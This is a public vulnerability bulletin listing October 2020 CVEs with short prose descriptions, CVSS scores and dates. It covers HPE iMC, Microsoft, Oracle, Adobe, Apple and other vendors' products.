hp — intelligent_management_center A wmiconfigcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7177
MISC
hp — intelligent_management_center A deployselectsoftware expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7148
MISC
hp — intelligent_management_center A soapconfigcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7174
MISC
hp — intelligent_management_center A forwardredirect expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7183
MISC
hp — intelligent_management_center A actionselectcontent expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7173
MISC
hp — intelligent_management_center A remote operatoronlinelist_content privilege escalation vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-24630
MISC
hp — intelligent_management_center A devsoftsel expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7191
MISC
hp — intelligent_management_center A syslogtempletselectwin expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24651
MISC
hp — intelligent_management_center A legend expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24650
MISC
hp — intelligent_management_center An adddevicetoview expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7141
MISC
hp — intelligent_management_center An accessmgrservlet classname deserialization of untrusted data remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24648
MISC
hp — intelligent_management_center A devicethresholdconfig expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7192
MISC
hp — intelligent_management_center A tvxlanlegend expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7185
MISC
hp — intelligent_management_center An ictexpertcsvdownload expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7193
MISC
hp — intelligent_management_center An iccselectrules expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7195
MISC
hp — intelligent_management_center An eventinfo_content expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7142
MISC
hp — intelligent_management_center A remote bytemessageresource transformentity input validation code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24649
MISC
hp — intelligent_management_center A remote accessmgrservlet classname input validation code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24647
MISC
hp — intelligent_management_center A tftpserver stack-based buffer overflow remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24646
MISC
hp — intelligent_management_center A remote urlaccesscontroller authentication bypass vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-24629
MISC
hp — intelligent_management_center A perfaddormoddevicemonitor expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7194
MISC
hp — intelligent_management_center A comparefilesresult expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 10 CVE-2020-7144
MISC
hp — intelligent_management_center A viewbatchtaskresultdetailfact expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7184
MISC
hp — intelligent_management_center A sshconfig expression language injection remote code execution vulnerability was discovered in HPE Intelligent Management Center (iMC) version(s): Prior to iMC PLAT 7.3 (E0705P07). 2020-10-19 9 CVE-2020-7182
MISC
jetbrains — youtrack In JetBrains YouTrack before 2020.2.10514, SSRF is possible because URL filtering can be escaped. 2020-10-19 7.5 CVE-2020-15822
MISC
CONFIRM
loginizer — loginizer The Loginizer plugin before 1.6.4 for WordPress allows SQL injection (with resultant XSS), related to loginizer_login_failed and lz_valid_ip. 2020-10-21 7.5 CVE-2020-27615
MISC
MISC
MISC
MISC
microsoft — 365_apps A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory, aka ‘Base3D Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-17003. 2020-10-16 9.3 CVE-2020-16918
MISC
microsoft — 365_apps A remote code execution vulnerability exists in Microsoft Outlook software when the software fails to properly handle objects in memory, aka ‘Microsoft Outlook Remote Code Execution Vulnerability’. 2020-10-16 9.3 CVE-2020-16947
MISC
MISC
MISC
microsoft — 365_apps A remote code execution vulnerability exists when the Microsoft Office Access Connectivity Engine improperly handles objects in memory, aka ‘Microsoft Office Access Connectivity Engine Remote Code Execution Vulnerability’. 2020-10-16 9.3 CVE-2020-16957
MISC
microsoft — 3d_viewer A remote code execution vulnerability exists when the Base3D rendering engine improperly handles memory. An attacker who successfully exploited the vulnerability would gain execution on a victim system. The security update addresses the vulnerability by correcting how the Base3D rendering engine handles memory, aka ‘Base3D Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16918. 2020-10-16 9.3 CVE-2020-17003
MISC
microsoft — network_watcher_agent An elevation of privilege vulnerability exists in Network Watcher Agent virtual machine extension for Linux, aka ‘Network Watcher Agent Virtual Machine Extension for Linux Elevation of Privilege Vulnerability’. 2020-10-16 7.2 CVE-2020-16995
MISC
microsoft — powershellget A security feature bypass vulnerability exists in the PowerShellGet V2 module, aka ‘PowerShellGet Module WDAC Security Feature Bypass Vulnerability’. 2020-10-16 7.2 CVE-2020-16886
MISC
microsoft — visual_studio_code A remote code execution vulnerability exists in Visual Studio Code when a user is tricked into opening a malicious ‘package.json’ file, aka ‘Visual Studio JSON Remote Code Execution Vulnerability’. 2020-10-16 9.3 CVE-2020-17023
MISC
microsoft — visual_studio_code A remote code execution vulnerability exists in Visual Studio Code when the Python extension loads a Jupyter notebook file, aka ‘Visual Studio Code Python Extension Remote Code Execution Vulnerability’. 2020-10-16 9.3 CVE-2020-16977
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16907. 2020-10-16 7.2 CVE-2020-16913
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists in Windows Setup in the way it handles directories. A locally authenticated attacker could run arbitrary code with elevated system privileges, aka ‘Windows Setup Elevation of Privilege Vulnerability’. 2020-10-16 7.2 CVE-2020-16908
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists in Windows when the Windows kernel-mode driver fails to properly handle objects in memory, aka ‘Win32k Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16913. 2020-10-16 7.2 CVE-2020-16907
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when Windows Error Reporting manager improperly handles a process crash, aka ‘Windows Error Reporting Manager Elevation of Privilege Vulnerability’. 2020-10-16 7.2 CVE-2020-16895
MISC
microsoft — windows_10 A remote code execution vulnerability exists when Windows Hyper-V on a host server fails to properly validate input from an authenticated user on a guest operating system, aka ‘Windows Hyper-V Remote Code Execution Vulnerability’. 2020-10-16 7.2 CVE-2020-16891
MISC
microsoft — windows_10 A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka ‘Windows Camera Codec Pack Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16968. 2020-10-16 9.3 CVE-2020-16967
MISC
microsoft — windows_10 A remote code execution vulnerability exists in the way that Microsoft Graphics Components handle objects in memory, aka ‘Microsoft Graphics Components Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16923. 2020-10-16 9.3 CVE-2020-1167
MISC
MISC
microsoft — windows_10 A denial of service vulnerability exists when the Windows TCP/IP stack improperly handles ICMPv6 Router Advertisement packets, aka ‘Windows TCP/IP Denial of Service Vulnerability’. 2020-10-16 7.8 CVE-2020-16899
MISC
microsoft — windows_10 A remote code execution vulnerability exists in the way that the Windows Graphics Device Interface (GDI) handles objects in the memory, aka ‘GDI+ Remote Code Execution Vulnerability’. 2020-10-16 9.3 CVE-2020-16911
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory, aka ‘Windows Hyper-V Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-1047. 2020-10-16 7.2 CVE-2020-1080
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when Windows Hyper-V on a host server fails to properly handle objects in memory, aka ‘Windows Hyper-V Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-1080. 2020-10-16 7.2 CVE-2020-1047
MISC
microsoft — windows_10 A remote code execution vulnerability exists when the Windows Camera Codec Pack improperly handles objects in memory, aka ‘Windows Camera Codec Pack Remote Code Execution Vulnerability’. This CVE ID is unique from CVE-2020-16967. 2020-10-16 9.3 CVE-2020-16968
MISC
MISC
microsoft — windows_10 A denial of service vulnerability exists in Remote Desktop Protocol (RDP) when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Protocol (RDP) Denial of Service Vulnerability’. 2020-10-16 7.8 CVE-2020-16927
MISC
microsoft — windows_10 A remote code execution vulnerability exists when the Windows Jet Database Engine improperly handles objects in memory, aka ‘Jet Database Engine Remote Code Execution Vulnerability’. 2020-10-16 9.3 CVE-2020-16924
MISC
microsoft — windows_10 An elevation of privilege vulnerability exists when Windows improperly handles COM object creation, aka ‘Windows COM Server Elevation of Privilege Vulnerability’. This CVE ID is unique from CVE-2020-16916. 2020-10-16 7.2 CVE-2020-16935
MISC
microsoft — windows_7 A denial of service vulnerability exists in Windows Remote Desktop Service when an attacker connects to the target system using RDP and sends specially crafted requests, aka ‘Windows Remote Desktop Service Denial of Service Vulnerability’. 2020-10-16 7.8 CVE-2020-16863
MISC
mintegral — mintegraladsdk This affects the package MintegralAdSDK before 6.6.0.0. The SDK distributed by the company contains malicious functionality that acts as a backdoor. Mintegral and their partners (advertisers) can remotely execute arbitrary code on a user device. 2020-10-19 10 CVE-2020-7745
MISC
MISC
MISC
MISC
nagios — nagios_xi Improper neutralization of special elements used in an OS command in Nagios XI 5.7.3 allows a remote, authenticated admin user to execute operating system commands with the privileges of the apache user. 2020-10-20 9 CVE-2020-5791
MISC
onethird — onethird Local file inclusion vulnerability in OneThird CMS v1.96c and earlier allows a remote unauthenticated attacker to execute arbitrary code or obtain sensitive information via unspecified vectors. 2020-10-20 7.5 CVE-2020-5640
MISC
MISC
oracle — business_intelligence Vulnerability in the Oracle Business Intelligence Enterprise Edition product of Oracle Fusion Middleware (component: Installation). Supported versions that are affected are 5.5.0.0.0, 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Business Intelligence Enterprise Edition. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Business Intelligence Enterprise Edition accessible data. CVSS 3.1 Base Score 7.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N). 2020-10-21 7.8 CVE-2020-14864
MISC
oracle — financial_services_analytical_applications_infrastructure Vulnerability in the Oracle Financial Services Analytical Applications Infrastructure product of Oracle Financial Services Applications (component: Infrastructure). Supported versions that are affected are 8.0.6-8.1.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Financial Services Analytical Applications Infrastructure. While the vulnerability is in Oracle Financial Services Analytical Applications Infrastructure, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of Oracle Financial Services Analytical Applications Infrastructure. CVSS 3.1 Base Score 8.6 (Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H). 2020-10-21 7.8 CVE-2020-14824
MISC
oracle — flexcube_direct_banking Vulnerability in the Oracle FLEXCUBE Direct Banking product of Oracle Financial Services Applications (component: Pre Login). Supported versions that are affected are 12.0.1, 12.0.2 and 12.0.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle FLEXCUBE Direct Banking. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Direct Banking accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N). 2020-10-21 7.1 CVE-2020-14897
MISC
oracle — flexcube_direct_banking Vulnerability in the Oracle FLEXCUBE Direct Banking product of Oracle Financial Services Applications (component: Pre Login). Supported versions that are affected are 12.0.1, 12.0.2 and 12.0.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle FLEXCUBE Direct Banking. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle FLEXCUBE Direct Banking accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N). 2020-10-21 7.1 CVE-2020-14890
MISC
oracle — hospitality_opera_5_property_services Vulnerability in the Oracle Hospitality OPERA 5 Property Services product of Oracle Hospitality Applications (component: Logging). Supported versions that are affected are 5.5 and 5.6. Easily exploitable vulnerability allows high privileged attacker with network access via HTTP to compromise Oracle Hospitality OPERA 5 Property Services. Successful attacks require human interaction from a person other than the attacker. Successful attacks of this vulnerability can result in takeover of Oracle Hospitality OPERA 5 Property Services. CVSS 3.1 Base Score 6.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:U/C:H/I:H/A:H). 2020-10-21 8.5 CVE-2020-14858
MISC
oracle — mysql Vulnerability in the MySQL Server product of Oracle MySQL (component: Server: Optimizer). Supported versions that are affected are 5.7.31 and prior. Easily exploitable vulnerability allows high privileged attacker with network access via multiple protocols to compromise MySQL Server. Successful attacks of this vulnerability can result in unauthorized ability to cause a hang or frequently repeatable crash (complete DOS) of MySQL Server as well as unauthorized update, insert or delete access to some of MySQL Server accessible data. CVSS 3.1 Base Score 5.5 (Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:L/A:H). 2020-10-21 7.5 CVE-2020-14760
CONFIRM
MISC
oracle — one-to-one_fulfillment Vulnerability in the Oracle One-to-One Fulfillment product of Oracle E-Business Suite (component: Print Server). Supported versions that are affected are 12.1.1 – 12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle One-to-One Fulfillment. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle One-to-One Fulfillment, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle One-to-One Fulfillment accessible data as well as unauthorized update, insert or delete access to some of Oracle One-to-One Fulfillment accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 7.8 CVE-2020-14863
MISC
oracle — peoplesoft_enterprise_scm_esupplier_connection Vulnerability in the PeopleSoft Enterprise SCM eSupplier Connection product of Oracle PeopleSoft (component: eSupplier Connection). The supported version that is affected is 9.2. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise PeopleSoft Enterprise SCM eSupplier Connection. Successful attacks of this vulnerability can result in unauthorized creation, deletion or modification access to critical data or all PeopleSoft Enterprise SCM eSupplier Connection accessible data as well as unauthorized access to critical data or complete access to all PeopleSoft Enterprise SCM eSupplier Connection accessible data. CVSS 3.1 Base Score 8.1 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N). 2020-10-21 8.5 CVE-2020-14865
MISC
oracle — scheduler Vulnerability in the Scheduler component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Easily exploitable vulnerability allows low privileged attacker having Local Logon privilege with logon to the infrastructure where Scheduler executes to compromise Scheduler. While the vulnerability is in Scheduler, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in takeover of Scheduler. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H). 2020-10-21 7.2 CVE-2020-14735
MISC
oracle — trade_management Vulnerability in the Oracle Trade Management product of Oracle E-Business Suite (component: User Interface). Supported versions that are affected are 12.1.1 – 12.1.3 and 12.2.3 – 12.2.10. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Trade Management. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle Trade Management, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle Trade Management accessible data as well as unauthorized update, insert or delete access to some of Oracle Trade Management accessible data. CVSS 3.1 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N). 2020-10-21 7.8 CVE-2020-14856
MISC
oracle — universal_work_queue Vulnerability in the Oracle Universal Work Queue product of Oracle E-Business Suite (component: Internal Operations). Supported versions that are affected are 12.2.3 – 12.2.9. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle Universal Work Queue. Successful attacks of this vulnerability can result in takeover of Oracle Universal Work Queue. CVSS 3.1 Base Score 8.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 9 CVE-2020-14862
MISC
oracle — universal_work_queue Vulnerability in the Oracle Universal Work Queue product of Oracle E-Business Suite (component: Work Provider Administration). The supported version that is affected is 12.1.3. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle Universal Work Queue. Successful attacks of this vulnerability can result in takeover of Oracle Universal Work Queue. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 10 CVE-2020-14855
MISC
oracle — weblogic_server Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 10 CVE-2020-14859
MISC
MISC
oracle — weblogic_server Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP, T3 to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 7.5 CVE-2020-14825
MISC
MISC
MISC
MISC
oracle — weblogic_server Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware (component: Core). Supported versions that are affected are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via IIOP to compromise Oracle WebLogic Server. Successful attacks of this vulnerability can result in takeover of Oracle WebLogic Server. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H). 2020-10-21 7.5 CVE-2020-14841
MISC
MISC
MISC


Medium Vulnerabilities

Primary Vendor — Product | Description | Published | CVSS Score | Source & Patch Info
acronis — true_image Acronis True Image 2021 fails to properly set ACLs of the C:\ProgramData\Acronis directory. Because some privileged processes are executed from the C:\ProgramData\Acronis, an unprivileged user can achieve arbitrary code execution with SYSTEM privileges by placing a DLL in one of several paths within C:\ProgramData\Acronis. 2020-10-21 6.9 CVE-2020-10140
MISC
adobe — illustrator Adobe Illustrator version 24.1.2 (and earlier) is affected by a memory corruption vulnerability that occurs when parsing a specially crafted .svg file. This could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24413
MISC
adobe — illustrator Adobe Illustrator version 24.1.2 (and earlier) is affected by a memory corruption vulnerability that occurs when parsing a specially crafted .svg file. This could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24415
MISC
adobe — illustrator Adobe Illustrator version 24.1.2 (and earlier) is affected by a memory corruption vulnerability that occurs when parsing a specially crafted .svg file. This could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24414
MISC
adobe — illustrator Adobe Illustrator version 24.2 (and earlier) is affected by an out-of-bounds read vulnerability when parsing crafted PDF files. This could result in a read past the end of an allocated memory structure, potentially resulting in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24409
MISC
MISC
adobe — illustrator Adobe Illustrator version 24.1.2 (and earlier) is affected by a memory corruption vulnerability that occurs when parsing a specially crafted .svg file. This could result in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24412
MISC
adobe — illustrator Adobe Illustrator version 24.2 (and earlier) is affected by an out-of-bounds read vulnerability when parsing crafted PDF files. This could result in a read past the end of an allocated memory structure, potentially resulting in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24410
MISC
MISC
adobe — illustrator Adobe Illustrator version 24.2 (and earlier) is affected by an out-of-bounds write vulnerability when handling crafted PDF files. This could result in a write past the end of an allocated memory structure, potentially resulting in arbitrary code execution in the context of the current user. This vulnerability requires user interaction to exploit. 2020-10-20 6.8 CVE-2020-24411
MISC
MISC
adobe — marketo_sales_insight Marketo Sales Insight plugin version 1.4355 (and earlier) is affected by a blind stored Cross-Site Scripting (XSS) vulnerability that could be abused by an attacker to inject malicious scripts into vulnerable form fields. Malicious JavaScript may be executed in a victim’s browser when they browse to the page containing the vulnerable field. 2020-10-20 4.3 CVE-2020-24416
MISC
advantech — r-seenet The R-SeeNet webpage (1.5.1 through 2.4.10) suffers from SQL injection, which allows a remote attacker to invoke queries on the database and retrieve sensitive information. 2020-10-20 5 CVE-2020-25157
MISC
apple — icloud An access issue existed in Content Security Policy. This issue was addressed with improved access restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing maliciously crafted web content may prevent Content Security Policy from being enforced. 2020-10-16 4.3 CVE-2020-9915
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud Multiple issues were addressed with improved logic. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A malicious attacker with arbitrary read and write capability may be able to bypass Pointer Authentication. 2020-10-16 6.5 CVE-2020-9910
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud An input validation issue was addressed with improved input validation. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0, watchOS 7.0, Safari 14.0, iCloud for Windows 11.4, iCloud for Windows 7.21. Processing maliciously crafted web content may lead to a cross site scripting attack. 2020-10-16 4.3 CVE-2020-9952
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A logic issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing maliciously crafted web content may lead to universal cross site scripting. 2020-10-16 4.3 CVE-2020-9925
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A command injection issue existed in Web Inspector. This issue was addressed with improved escaping. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Copying a URL from Web Inspector may lead to command injection. 2020-10-16 6.8 CVE-2020-9862
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution. 2020-10-16 4.3 CVE-2020-9894
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A use after free issue was addressed with improved memory management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution. 2020-10-16 6.8 CVE-2020-9893
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution. 2020-10-16 6.8 CVE-2020-9936
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — icloud A URL Unicode encoding issue was addressed with improved state management. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A malicious attacker may be able to conceal the destination of a URL. 2020-10-16 5 CVE-2020-9916
MISC
MISC
MISC
MISC
MISC
MISC
MISC
apple — ipad_os A logic issue was addressed with improved restrictions. This issue is fixed in iOS 14.0 and iPadOS 14.0, macOS Catalina 10.15.7, tvOS 14.0, watchOS 7.0. A malicious application may be able to access restricted files. 2020-10-16 4.3 CVE-2020-9968
MISC
MISC
MISC
MISC
apple — ipad_os An issue existed in the handling of iMessage tapbacks. The issue was resolved with additional verification. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. A user that is removed from an iMessage group could rejoin the group. 2020-10-16 4.3 CVE-2020-9885
MISC
MISC
MISC
MISC
apple — ipad_os An input validation issue existed in Bluetooth. This issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8. An attacker in a privileged network position may be able to perform denial of service attack using malformed Bluetooth packets. 2020-10-16 5 CVE-2020-9914
MISC
MISC
apple — ipad_os A logic issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0, watchOS 7.0. A malicious application may be able to leak sensitive user information. 2020-10-16 4.3 CVE-2020-9976
MISC
MISC
MISC
apple — ipad_os This issue was addressed with improved checks. This issue is fixed in iOS 13.6 and iPadOS 13.6. A remote attacker may be able to cause a denial of service. 2020-10-16 5 CVE-2020-9917
MISC
apple — ipad_os A denial of service issue was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6. A remote attacker may cause an unexpected application termination. 2020-10-16 5 CVE-2020-9931
MISC
